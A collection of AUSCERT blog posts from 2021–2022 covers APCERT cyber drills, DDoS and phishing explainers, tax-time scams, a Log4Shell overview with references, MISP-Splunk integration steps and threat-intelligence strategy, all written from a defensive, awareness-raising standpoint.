Blogs

APCERT CYBER DRILL 2022

7 Sep 2022

The Asia Pacific Computer Emergency Response Team (APCERT) recently conducted its annual drill, a means of maintaining and improving awareness and skills within the cyber security community through this collaborative undertaking. The theme for 2022 was “Data Breach through Security Malpractice” which focused on realistic, real world cyber security risks and incidents that could potentially result. AUSCERT Analyst Narayan Neupane said, “This year’s drill was about tracing a ransomware activity and tracing the uploaded file’s location via provided evidence. The drill focused on packet capture, email analysis, forensic investigation, and incident response.” He continued, “Whilst some activities performed in the drill are carried out more than others in our daily work, it’s important and worthwhile to be tested in unexpected ways – it reflects what happens in the real world!”. The experiences and tasks conducted by each participating team allow for knowledge sharing with no single CERT typically experiencing the same issues or providing like-for-like services. The APCERT drill aims to maintain and progress internet security and safety with the exercise providing participants with the chance to improve communication protocols, technical responses, and the overall quality of incident responses. “This year’s drill was tough but also, fun and there was a feeling of satisfaction once we were able to finish the drill successfully”, Narayan concluded. This year, 25 CSIRTs from 21 economies took part in the drill and although undertaken in a few hours, the lessons learned from the experience can provide benefits long after. As each drill typically requires six to eight months of planning and preparation, the 2023 APCERT Cyber Drill will soon be underway – the ongoing need for education and skill enhancement reflects the rapid development of the digital world we reside in and the threats we all face.

Learn more

Blogs

What is DDoS & How Does it Work?

9 Aug 2022

What is distributed denial of service (DDoS) & How Does it Work? The AUSCERT team provides proactive and reactive incident response assistance actively seeking information from various sources to help find data relevant to a client. We take immediate action and follow well-defined protocols in order to obtain a resolution and satisfactory outcome. This article is aimed at those who need a high level explanation of what a DDoS attack is. DDoS Attacks In 2022 Already in 2022 the IT industry has experienced a large increase of distributed denial of service (DDoS) attacks. Not that long ago, most DDoS attacks were seen as minor nuisances perpetrated by harmless novices who did it for fun, back then DDoS attacks were relatively easy to mitigate.   DDoS attacks are becoming an extremely sophisticated activity, and in many cases, big business. According to TechRepublic, in the first quarter of 2022, Kaspersky DDoS Intelligence systems detected 91,052 DDoS attacks. 44.34% of attacks were directed at targets located in the USA, which comprised 45.02% of all targets.   Exactly What Is a DDoS Attack? Despite DDoS attacks becoming ever more common, they can be quite sophisticated and difficult to combat. But what exactly is a DDoS attack and what does DDoS stand for? DDoS is the anagram for Distributed Denial of Service. A DDoS attack occurs when a threat actor uses resources from multiple, remote locations to attack an organisation’s online operations. The goal is to consume resources so that legitimate access to services is not possible, for example, a website or online service will appear to be ‘down’ for people attempting to use it. DDoS attacks usually focus on generating a huge amount of network traffic that overwhelm operations of network equipment and services such as routers, domain name services or web caching. How Long Can DDoS Attacks Last For? The short answer – there is no set duration. DDoS attacks vary extensively in both duration and sophistication: Long-Term Attack: An attack waged over a period of hours or days is referred to as a long-term attack. For example, the largest recorded DDoS attack was against Amazon Web Services (AWS), this caused disruption for three days before finally being finally mitigated. Burst Attack: Also known as pulse-wave attacks, as the name implies they are waged over a very short period of time, lasting from a few seconds to a few minutes and occurring in frequent bursts. Again, time is not really a factor; the quicker, burst attacks can also be as damaging as the long-term attacks.   How to Protect Your Organisation Against DDoS Attacks Some measures that organisations can take to protect themselves against DDoS attacks are: Reduce the attack surface of Internet-visible services to only that which is required. For example, inbound ICMP packets are unlikely to be needed and should be blocked. Use a Content Delivery Network (CDN). Implement server-level DDoS mitigation measures, making use of best practice guides from application and operating system software providers. Plan for disruption including alternative ways of providing services to clients. Short term increases in network or server capacity may be a solution, depending on the costs. Knowing these in advance will inform business continuity planning discussions. Implementing monitoring systems to detect large increases in outbound network traffic to avoid becoming part of the problem and the cause of reputational damage. Phishing Take-down service AUSCERT’s Phishing Take-down service works to reduce brand damage by requesting the removal of fraudulent websites. The service puts the safety of your brand at the forefront by detecting and acting immediately if your organisation is affected. To find out more about this service click here.

Learn more

Blogs

What is Phishing?

9 Aug 2022

What is Phishing? Phishing is an attack whereby the attacker impersonates a reputable entity or person in email or other forms of communication, such as SMS or instant messaging. Most commonly attackers will use phishing emails to distribute malicious links or attachments that can perform a variety of malicious functions. Phishing Attacks A phishing attack can have devastating results. For individuals, this includes unauthorised purchases, electronic theft of money, or identity theft. Phishing attacks can often be used to gain a foothold into an organisation’s network, as a part of a larger attack, such as ransomware or Business Email Compromise. This happens when employees are compromised in order to bypass security controls and distribute malware or fraudulent messaging inside the victim organisation. A successful attack on an organisation can have severe implications such as financial losses and extended outages, in addition to a reduction of market share, damaged reputation, and loss of customer trust. Types Of Phishing Attacks Email Phishing Scams In the most common version of email-based phishing, the attacker sends out thousands of fraudulent messages with the intent of gathering personal information, account credentials or for financial gain. This type of attack is very much a numbers game, even if 1% of several thousand recipients fall for the scam, then the attack can be considered successful. As with legitimate marketing campaigns, to improve success rates fraudsters will also take the time and effort to maximise their effort by trialling different messaging and tactics and studying their relative success rates.  They will clone emails from a spoofed organisation, by using the same phrasing, typefaces, logos, and signatures to make the messages appear legitimate. Additionally, attackers will commonly try to push users into action by creating a sense of urgency. For example, an email could threaten account expiration and place the recipient on a deadline. By applying a time-sensitive cue, users are more likely to act sooner rather than later, without much thought. These scams can be hard to spot, typically having a misspelt website address or extra subdomain, so for example www.commbank.com.au/login could be www.combank.com.au/login. The similarities between the two website addresses give the impression of a legitimate link, making it more difficult to discover an attack is taking place. Spear Phishing This is a more precisely focused attack as spear phishing targets a specific person or organisation, as opposed to thousands of people as described above. It’s a more specific type of phishing that often incorporates special knowledge about an organisation, such as its staff members’ names and titles, organisational structure and clients. A common spear phishing attack scenario is where the attackers will research names of employees within an organisation’s marketing department in order to gain access to the latest project invoices. Posing as a marketing director, the attacker emails a departmental project manager (PM) using a subject line that reads something like: “Updated invoice for Q3 campaigns”. This email will be a clone of the organisation’s standard email template. A link in the email redirects to a password-protected internal document, which is simply a spoofed version of a stolen invoice. The PM is requested to log in to view the document. The attacker steals the login credentials, gaining full access to sensitive areas within the organisation’s network. By providing an attacker with valid login credentials, spear phishing is an effective method for executing the first stage of further attacks, such as ransomware or Business Email Compromise. How To Prevent Phishing To protect against phishing attacks some steps should be taken by both employees and enterprises. For employees, simple vigilance is vital. A spoofed message will almost always contain subtle differences that expose their fraudulent purpose. These frequently include spelling errors such as website names. Users should also stop and think about why they’re even receiving the email and if it seems unusual or out of character for the alleged sender. At an enterprise level, a number of steps can be taken to mitigate both phishing and spear phishing attacks: Two-factor authentication (2FA) is the most effective method for countering phishing attacks, as it adds an extra verification layer when logging in to applications. 2FA relies on users having two things: something they know, such as a password and username, and something they have, such as a mobile phone running an authentication app. Organisations should enforce a strict password management policy that takes into account how people actually behave. For example, staff should be required to use passwords that are difficult for an attacker to guess but not so complex they can’t be remembered by people. Passphrases are often a better strategy than complex passwords. Password managers combine convenience and strong passwords and their use should be encouraged. Staff should be educated not to reuse the same password for multiple accounts, as this makes password spraying attacks much easier. Empowering employees through engaging and informative cyber security awareness training will help reduce the threat of most cyber security attacks, including phishing. Enable SPF and DMARC to make it more difficult for attackers to send email faking an organisation’s identity. Early Warning SMS Early warning notifications assist in managing critical security threats to your network. AUSCERT monitors malicious activity online and the Early Warning Service provides SMS notifications of any immediate and serious threats relevant to your industry. To find out more about this service click here.

Learn more

Blogs

Staying aware this tax time

5 Jul 2022

As one financial year ends and another begins, Australians start preparing their tax applications and with it, an increase in the frequency and scope of tax-related phishing is expected. We are going to look at various methods a scammer/attacker might use to obtain your personal information such as username, password, credit card details, contact details or any other information that identifies you as you. This personal information is then used fraudulently or to conduct further malicious activities depending on the data obtained.   Email phishing Email phishing is one of the most common methods used to obtain your personal information. The sender imitates the Australian Tax Office (ATO) or MyGov and sends a phishing email that looks like a legitimate email. The spoofed email address may be difficult to detect when the recipient is using a phone as typically, it does not show the actual email address in full, revealing who it was sent from. a. Email with a Phishing URL Usually, such emails contain a phishing link that when clicked, redirects the user to a website asking for personal information. Emails that request the recipient to enter their details, such as bank account information, could lead to fraud. Example of malicious email with a phishing URL   b. Email with a local HTML attachment Some emails will not contain any phishing URLs within the body of the email. Instead, the email will have an HTML file as an attachment. When a user opens the HTML attachment, it will link to a phishing form requesting the user enter a username and password. The HTML file contains code that sends the credentials to the attacker (if entered). Such techniques are used to avoid email security software. Example of malicious email with an HTML attachment Example of malicious email with an HTML phishing form   Smishing (SMS Phishing) As consumers become more aware of potential threats and scams, attackers develop new methods to target and trick recipients. One such method is smishing. This method is quite simple as the fake texts are disguised to come from a known and trusted source such as a bank or, the ATO. In this instance, a text message with a URL is sent to a phone number pretending to be MyGov. When clicked, the user is redirected to a MyGov phishing page where they are required to enter personal information. Additionally, it could then redirect the user to a secondary phishing page made to look like a bank. Example of malicious phishing link in SMS/Text Message (1) Example of malicious phishing link in SMS/Text Message (2) Example of phishing page (MyGov) Example of phishing page redirecting to secondary phishing page (MyGov to a bank)   It is important to know that ATO or MyGov would not send any email or text message directly to ask for any personal information. Should you receive a suspicious email or SMS, please report it to ReportEmailFraud@ato.gov.au or contact ATO. If something looks suspicious, be it the spelling, website address or the request within the message, do not click the link or proceed! ATO is a member of AUSCERT and we help ATO in deactivating such phishing websites. AUSCERT members have access to the Malicious URL Feed which is automatically populated with malware and phishing links as AUSCERT’s Analyst Team processes them and is updated every 15 minutes. Additional indicators (over and above the malicious URLs) such as email content, and phish page screen captures, can be found in AUSCERT’s Member Security Incident Notifications (MISP). Further information on the mentioned services can be found at the links below: AUSCERT Malicious URL Feed AUSCERT MISP

Learn more

Blogs

BDO and AUSCERT Cyber Security Survey Report 2021

13 Apr 2022

BDO and AUSCERT say the federal government’s technology investment boost is a good first step to heighten the resilience of Australian businesses. However, there is a need for business guidance to avoid another ‘pink batts’ fiasco. The emergence of questionable ‘pop-up’ providers is a reality, say the industry experts. On 29 March 2022, as part of the 2022–23 Budget, the Australian Government announced it will support small business via the Small Business Technology Investment Boost and Small Business Skills and Training Boost. Small businesses with annual turnover of less than $50 million will be able to deduct 120% of eligible training and assets, such as cyber security systems or subscriptions to cloud-based services, in their 2022–23 tax return. AUSCERT and BDO are calling for guidance to be provided for SME’s looking to take advantage of the government incentives to mitigate the chance of inadequate governance. “AUSCERT recognises the significance of the latest federal government announcement and hope the promise will be matched equally by delivery,” said AUSCERT Director David Stockdale. “While it is easy for a government in the runup to an election to make promises, the true benefit is in recognising the needs of SME’s and then delivering the training that will lift the cyber security posture of these organisations. This is a huge task, and with additional pressures on the already stretched Australian Cyber Security Centre to be actively involved with additional critical infrastructure requirements amongst other things, it will fall to the private sector to fill the gap.” “Helping SMEs to understand the threats, assess their own risk landscape and implement proportional controls is critical, and is no easy task. Risk management and cybercrime awareness aren’t the core business of most SMEs, and history has shown that even large corporates can fall victim to wide scale breaches if inadequate governance is in place over contractors such as managed Cyber Security Operations Centres,” noted David. “Training, and regulation of the training, needs to address these knowledge gaps – let’s hope we do not see providers pedalling a “silver bullet” course and we find ourselves looking back and see another ‘pink batts’ fiasco.” The latest BDO and AUSCERT Cyber Security Survey found incidents requiring data recovery efforts also rose by 160% from 2020, suggesting that cyber attacks are becoming more destructive and laser focused. BDO Partner and National Cyber Security Leader Leon Fouche said, “The technology investment boost is a great first step to heighten the resilience of Australian businesses. However, the government announcements to help drive training creates a ripe environment for ineffective training and providers to pop up.” The BDO and AUSCERT survey found that 2021 saw a staggering 175% increase for data breaches caused by accidental emails, such as ‘CC’ing’ instead of ‘BCC’ing’, indicating that staff security awareness training may not be as robust as needed in the wake of remote working arrangements “With the steady increase in working remotely driven by the pandemic there is growing awareness of the need for training,” said Leon. “Indeed, our report showed that 1 in 4 organisations have invested in some form cyber awareness training. Yet most organisations don’t have a chief security officer, or specialist security contractor on speed dial to keep up with the rapidly changing landscape of cyber threats, so the government will need to be able to provide SME’s with a starting point and ongoing support to really help these incentives be impactful.” The BDO and AUSCERT Cyber Security Survey found that 60% of organisations use some form of cyber threat intelligence, meaning those who are not continually learning about new cyber threats are lagging behind their peers. The survey identified several steps business can take to significantly lessen cyber incidents, including onboarding Security Operations Centres, implementing Cyber Awareness Training, undertaking Supply Chain Risk Assessments, and creating Cyber Incident Response Plans. “No doubt the incentives announced by the government will drive SMEs signing on to training and purchasing assets,” commented Leon. “Whether this means a business’s first training course for their staff or upskilling of those employees who already have some awareness training. What is key is guidance on how business can best invest so their efforts are most effective, including avoiding investment in poor training or assets.” BDO forensic expert Stan Gallo said, “Rather than just handing money to the SME owners and leaving them to it, an alternative approach might be to first guide them to where they can discuss the possibilities and get advice on technology investment that can take their business to the next level. There is a lot more to digital evolution than a flashy website or a cloud subscription and throwing money at SME business. Stan noted that the Technology Investment Boost will be a great opportunity to enhance cybersecurity, but hardly revolutionary. “The Technology Investment Boost is terrific for innovative tech driven start-ups and entrepreneurial business, but mature SME’s looking to grow still need to understand the basics of how technology can enhance their business, in addition to standard backend operations. Many people that have laboured over the years and built up a successful business, particularly in traditionally non technology driven areas, still need assistance to understand technology investment and how it can add value to their business operations.” “There is an increased risk the money will be spent on standard IT support and lacklustre training provided by questionable ‘pop-up’ providers,” cautioned Stan. “The types of threats we are seeing continue to evolve in line with current events and technologies, but at their core, there remain many similarities. Phishing, ransomware encryption, business email compromise and data theft are still ever present,” noted Stan. “However, there has been some insidious countermovement. For example, on the back of a growing trend of heightened preparedness and recoverability, thereby denying ransom payments, the ‘standard’ ransomware attack is now regularly linked to an initial theft of data to provide two bites at the cherry. If the victim is not going to pay the ransom – then maybe, they will pay to get their confidential data back. As usual there are no guarantees either way.” You can view a copy of the BDO and AUSCERT Cyber Security Survey at the following link: Cyber Survey Report 2021

Learn more

Blogs

.au Direct Domain names are a new option for Australian internet users

18 Mar 2022

From 24 March 2022, the Australian Domain Administration (auDA) will be introducing a new option for Australian internet users with the availability of .au direct domain names. The shorter and simpler domain names (such as pavlova.au, station.au and so on) will be open to individuals and organisations that wish to have an online presence, new or existing, with the proviso that they have a verified connection to Australia. Whilst offering convenience for businesses and individuals, it also presents an opportunity for cybercriminals to create malicious domains. At AUSCERT, it’s our purpose to understand just what those threats might be to provide our members with an analysis of the situation. While it is impossible to completely prevent all kinds of domain name abuse, the requirements auDA has in place (such as registrants needing to have an ‘Australian presence’) certainly help mitigate against widespread and easy abuse (as is prevalent in many other jurisdictions). auDA has extensive resources available should you wish to learn more, including detailed information regarding registering domain names in .au direct, timelines, domain conflict resolution and so on. In addition, you can contact your preferred domain retailer. However, in brief, some points of note are: auDA continues with its strict rules against .au domains being used in any malicious or illegal activities and will take action against recognised offenders. auDA will provide priority registration to those organisations with existing registered domains to the same name in ‘.au’. For example, here at AUSCERT, we have ‘auscert.org.au’ which gives us priority to register and use ‘auscert.au’. This priority period is for six months from the launch date (24 March 2022) to register the ‘.au’ domain after which, it becomes available to anyone. Essentially, this means you have until 20 September 2022 to register any existing domain names you wish to have the new ‘.au’ version of. An “Australian presence” will be required to register a .au direct domain and essentially requires one of: An ABN A Trademark number Australian identification document (passport, driver’s license, etc.) So, what does this mean for you? Be aware that the .au direct domains are being launched on 24 March 2022. Consider which of your existing domains you may wish to register in .au direct. We encourage all members wishing to undertake this process, to do so within six months to avoid any potential issues arising later. Determine whether there may be any potential conflicts with other domain name registrants and understand the auDA process for resolving the conflicts. Check the auDA website for complete details. Contact your preferred domain retailer to register your new domains. Consider which new (rather than existing) domain names you may wish to register. Be aware that the opening up of a new domain space always provides a potential for the resurgence of domain abuse (such as domain squatting, phishing, etc) and take pre-emptive measures such as domain registration in the new domain space. Please contact the team at AUSCERT if you have any security-related questions relating to the introduction of .au direct domains you believe we can assist with. All other questions concerning, for example, domain registration, conflict resolution and so on are best dealt with by reviewing auDA’s or your retailer’s .au direct resources.

Learn more

Blogs

Log4Shell-Logjam Overview

15 Dec 2021

Log4Shell-Logjam Overview Picture credit : Lunasec[1] TLDR; Patch, check your patches work, check logs for attempts and possible compromise.   Log4Shell is a tag used by Lunasec[1] to describe the vulnerability in Apache Log4j2 that was disclosed abruptly by a tweet[2] and a github repo. This sudden announcement alerted security professionals to work in a short time frame to protect systems and avoid other interested parties in discovering, compromising and potentially taking over systems. Security groups alerted through the above were computer emergency response teams, which recognised the impact and came out with early advisories[3][4][5] which are either being updated or are being referenced by newer advisories[6]. The attack surface was of prime concern and security professionals were exchanging ways to detect through various third party search results.  One of the lists of the attack surface that was published early showed that Log4Shell or LogJam would affect a large number of systems[7][8].  Ways to detect affected servers were refined into a script[9][10] and other entities also released tools to detect vulnerable servers through first party scanning[11][12][13].  First party scanning is not of concern but unauthorised second party scanning is. This activity was eventually detected[14], and exploit payloads soon followed[15]. The manner in which the vulnerability was disclosed gave a short time frame for the naming and grading.  This was evident as the PSIRT initial only had release candidates[16][17] which later were checked and reported that both had to be used[18]. The vulnerability was later allocated CVE-2021-44228[19] and carried the PSIRT’s analysis[20][21] of a CVSSv3 base score of a perfect 10.0. (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). Before a full patch was available by the PSIRT[22], mitigations were collated and a vaccine made available[23][24] to provide an easy way to mitigate[24] the unauthorised second party scanning attempts to drop a malicious payload. No doubt there will be more numerous and extensive reports[26][27][28][29][30][31][32][33][34][35] made available by noted security organisations, as well as a plethora of resources listed to help[36][37], but the advice right now is as the TLDR, check your version[38][39], patch, check your patch, check your logs for attempts and possible compromise[40], and take remediation steps if any IoC show up[41][42][43][44][45][46]. In a time span no longer than a week CVE-2021-44228 has gone from proof of concept drop to internet wide scans to carrying crypto-coin miner payloads to no being found to carry ransomware payloads.[47][48] Finally, if your weekend was thought to be hectic as a result of this abrupt disclosure, send some positive thoughts to the three volunteers[49][50] who maintain a piece of code that the internet has come to depend so much on.  These three volunteers have worked very hard getting us a patch as soon as possible.[51] As well, we would like to thank all the contributors that have made this article possible by submitting to us relevant links and articles. [1] Lunasec Advisory https://www.lunasec.io/docs/blog/log4j-zero-day/ [2] Tweeted 0-Day https://twitter.com/P0rZ9/status/1468949890571337731 [3] NZCERT https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/ [4] AUSCERT ASB https://portal.auscert.org.au/bulletins/ASB-2021.0244.2 [5] SingCERT https://www.csa.gov.sg/en/singcert/Alerts/al-2021-070 [6] AUSCERT ESB https://portal.auscert.org.au/bulletins/ESB-2021.4186 [7] Attack Surface https://github.com/YfryTchsGD/Log4jAttackSurface [8] Randori Blog https://www.randori.com/blog/cve-2021-44228/ [9] log4j_rce_check https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6 [10] Log4j2Scan https://github.com/whwlsfb/Log4j2Scan [11] Qualys Detection https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell [12] SocPrime https://socprime.com/blog/cve-2021-44228-detection-notorious-zero-day-in-log4j-java-library/ [13] Imperva https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/ [14] Log4j RCE Attempts https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217 [15] Cloudflare Blog https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/ [16] PSIRT rc1 https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1 [17] PSIRT rc2 https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2 [18] CyberKendra https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html [19] NVDB https://nvd.nist.gov/vuln/detail/CVE-2021-44228 [20] RecordedMedia https://therecord.media/log4j-zero-day-gets-security-fix-just-as-scans-for-vulnerable-systems-ramp-up/ [21] PSIRT Advisory https://logging.apache.org/log4j/2.x/security.html [22] PSIRT Download https://logging.apache.org/log4j/2.x/download.html [23] Cybereason Blog https://www.cybereason.com/blog/cybereason-releases-vaccine-to-prevent-exploitation-of-apache-log4shell-vulnerability-cve-2021-44228 [24] Cyberreason Vax https://github.com/Cybereason/Logout4Shell [25] DarkReading https://www.darkreading.com/dr-tech/what-to-do-while-waiting-for-the-log4ju-updates [26] PaloAlto https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/ [27] Cloudflare Blog https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/ [28] Cloudflare Blog https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/ [29] Sygnia Advisory https://blog.sygnia.co/log4shell-remote-code-execution-advisory [30] ISC SANS Diary https://isc.sans.edu/forums/diary/RCE+in+log4j+Log4Shell+or+how+things+can+get+bad+quickly/28120/ [31] ISC SANS Diary https://isc.sans.edu/forums/diary/Log4j+Log4Shell+Followup+What+we+see+and+how+to+defend+and+how+to+access+our+data/28122/ [32] Crowdstrike https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/ [33] Bleeping Computer https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/ [34] Trusted Sec https://www.trustedsec.com/blog/log4j-playbook/ [35] Bleeping Computer https://www.bleepingcomputer.com/news/security/log4j-list-of-vulnerable-products-and-vendor-advisories/ [36] Reddit List of resources on log4j  https://www.reddit.com/r/netsec/comments/rcwws9/rce_0day_exploit_found_in_log4j_a_popular_java/ [37] CVE-2021-44228-Log4Shell-Hashes  https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes [38] NCSC-NL https://github.com/NCSC-NL/log4shell [39] BlueTeam CheatSheet https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592 [40] Log4ShellDetector  https://github.com/Neo23x0/log4shell-detector [41] Bazaar https://bazaar.abuse.ch/browse/tag/log4j [42] URLHaus https://urlhaus.abuse.ch/browse/tag/log4j [43] Threatfox https://threatfox.abuse.ch/browse/tag/log4j [44] CuratedIntel https://github.com/curated-intel/Log4Shell-IOCs [45] Microsoft Guidance https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/ [46] TryHackme https://tryhackme.com/room/solar [47] Twitter https://twitter.com/80vul/status/1470272820571963392?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Etweet [48] Twitter https://twitter.com/ankit_anubhav/status/1470648109625536515 [49] Twitter “@FiloSottile” https://twitter.com/FiloSottile/status/1469441487175880711 [50] Twitter “@matthew_d_green” https://twitter.com/matthew_d_green/status/1469715416549367812 [51] ITNews https://www.itnews.com.au/news/log4js-project-sponsorship-skyrockets-after-critical-bug-exploitation-573914

Learn more

Blogs

Setting up MISP as a threat information source for Splunk Enterprise

1 Nov 2021

Setting up MISP as a threat information source for Splunk Enterprise By Nicholas Soysa, AUSCERT Disclaimer: The following information is only relevant to AUSCERT members who are formally part of the CAUDIT-ISAC or AUSCERT-ISAC. For more info on this optional add-on service, please refer to the following page   1. Get a license or free trial account. If you’re an existing Splunk customer, then you should already have the credentials to access Splunk. If you’re keen on trying out first, you can obtain a limited free trial account at https://www.splunk.com/en_us/download.html.   2. Install and run Splunk Enterprise. Download the appropriate installer for your platform (32- or 64-bit)  and follow the installation steps. Launch the Splunk Enterprise search head Log into your Splunk Administrator account   IMPORTANT: MISP42Splunk 4.3.0 has been merged to the master branch. The information in section 3 is no longer relevant. You can now update misp42splunk using the “Upgrade App” (exisitng app) or “Install” option (fresh installs), as usual.   3. Install and setup MISP42Splunk MISP42Splunk 2.2.0 is not currently in the master branch. NOTE: Once the update’s been merged to the master branch, Until then, download the file from the github repo at: https://github.com/remg427/misp42splunk/tree/2.2.0 Extract the ZIP archive. Convert the folder “misp42splunk” to TAR.GZ format using a utility like 7-zip or the command line. Return to the Splunk app and navigate to “Apps” Select the “Install App from file” option Select the archive misp42splunk.tar.gz which you created and click Upload Restart Splunk when prompted   4. Add MISP instance Create a MISP instance name. For example: “AUSCERTMISP” MISP URL = Base URL of the MISP instance (e.g. https://misp-c.auscert.org.au OR https://misp.auscert.org.au) For the “Set the MISP auth key” enter a valid API key for a MISP user which has “authkey access privileges. This is typically any user with “User” up to “Org admin” roles. Untick the “Check SSL certificate of MISP server” box. We no longer require client certificate to authenticate. Untick the “Use a client certificate” if ticked. Press “Save”. Once the save is completed, you will be returned to the Apps page.   5. Check it works Navigate to the MISP42 apps (Apps dropdown -> MISP42) In the MISP42 app page, select Reports Then select, for example, mispgetioc misp_instance=AUSCERTMISP last=1d If the app works, then you should see Attributes from MISP event returned in the report It is suggested to store the feeds in an index which can be then queried in future if needed.     6. Resources        CAUDIT-ISAC users can access the PDF version at: https://wordpress-admin.auscert.org.au/publications/2018-08-22-misp-integration (Member portal login required) AUSCERT-ISAC users can access the document at: https://wordpress-admin.auscert.org.au/publications/2019-03-04-misp-integration (Member portal login required)   7. Credits       Thanks to Remi Seguy (author of misp24splunk) for promptly implementing this feature request.  

Learn more

Blogs

APCERT CYBER DRILL 2021

1 Sep 2021

APCERT CYBER DRILL 2021 The progression toward a growing reliance on the e-economy within the Asia Pacific region requires ongoing protection of the various infrastructures, integral to the political and economic stability and security. The Asia Pacific Computer Emergency Response Team (APCERT) recently conducted its annual drill, a means of maintaining and improving awareness and skills within the cyber security community through this collaborative undertaking. This year’s theme, “Supply Chain Attack Through Spear-Phishing – Beware of Working from Home”, reflects real-world incidents and issues, experienced globally. As a founding member, AUSCERT has participated in every drill since their inception with Operations Manager, Geoff Thonon stating that the drill is “More important than ever”. “Whilst there is a time limit, the purpose of the drill isn’t to identify the fastest (CERT) team but rather, to work collaboratively to challenge and develop everyone’s skills”, Geoff continued. The experiences and tasks conducted by each participating team allows for knowledge sharing with no CERT typically experiencing the same issues or providing like for like services. The APCERT drill aims to maintain and progress internet security and safety with the exercise providing participants the chance to improve communication protocols, technical responses and the overall quality of incident responses. Although undertaken in a few hours, the lessons learned from the experience can continue long after. Analysing the challenges, choices and responses of teams provides an insight into the various perspectives of other participants. “The information available to each team from the drill provides a greater understanding of the how and why that can lead to year-round training and development for staff”, Geoff stated. With 26 CERTs from 20 economies within the Asia Pacific region taking part, there is a wealth of knowledge and experience to draw upon in the quest for ongoing learning and growth within the sector. As each drill typically requires six to eight months of planning and preparation, the 2022 APCERT Cyber Drill will soon be underway – the ongoing need for education and skill enhancement a reflection of the rapid development of the digital world we now reside in! 

Learn more

Blogs

Using threat intelligence to produce a cyber defence strategy

20 Aug 2021

Using threat intelligence to produce a cyber defence strategy Very few practitioners need to be told of contemporary cyber threats such as ransomware, it has found its way into the common language of risk assessments, disaster recovery plans and mainstream media alike. But what can be done other than writing playbooks and practicing response plans, following the Essential 8 and blocking known malicious indicators? Those organisations with a strategic approach to cyber defence will more likely survive a ransomware attack, and consideration of an attacker’s motive may be key towards mounting a successful defence. For example, if the motive is purely financial and the attacker causes significant business disruption if the ransom demand is not met, what controls can prevent this? However, if the motive is to hold to ransom the intellectual property, customer database or another information asset, should priority instead be given to controls which detect and mitigate data exfiltration? Whilst senior management’s risk tolerance level may be “we must implement all possible countermeasures,” few organisations will have the luxury of doing so. Utilising available data sets to form operational “cyber threat intelligence” can help mitigate harmful events such as ransomware attacks. Most importantly, to do so is within the reach of most organisations following the explosion of available open-source tools and data sets. Such “tactical” cyber threat intelligence usually consists of Indicators of Compromise (IoCs) – technical data such as known bad IP addresses, URLs, emails and file hashes. Here is where the value proposition of CERTs (Cyber Emergency Response Teams) pays off: not-for-profit organisations providing open source and member-funded services, passionate teams consisting of analyst, dev-ops and engagement functions, CERTs are trustworthy due to their independent status. CIRCL from Luxembourg famously produce the Malware Information Sharing Platform (MISP) and tactical data feeds, used worldwide by other CERTs including AUSCERT, governments and private enterprise. Many organisations do not have resources beyond the tactical level, however simply using tactical feeds of IoCs has shown to be effective detecting or even preventing the initial stages of a ransomware attack. Relevant and concise IoCs may be used in content filters, centralised logging, SIEM or even custom-scripted solutions to hunt or block threats. AUSCERT’s Malicious URL Feed is an example of a high-confidence, low-volume feed, usually consumed in an automated fashion but also suitable for manual threat hunting, depending upon the consumer’s available resources. Members of AUSCERT’s MISP community can study operational intelligence such as attackers’ tools, techniques and procedures, even visually. A “mind map” connects similar events and data, allowing members to correlate campaigns and understand the techniques used in incidents such as ransomware attacks, for example. Organisations can then form strategic plans regarding the risks associated with cyber threats. Most importantly of all, a collaborative approach must be foremost in discussions regarding cyber defence strategy. A common misconception is that sharing threat information may compromise competitive advantage, however a particular strength of CERTs is coordinating, anonymising and analysing incident data, and then providing operational intelligence to members – even entire sectors. Have you included your local CERT in your IR (Incident Response) plans? Mike HolmSenior Manager, AUSCERT

Learn more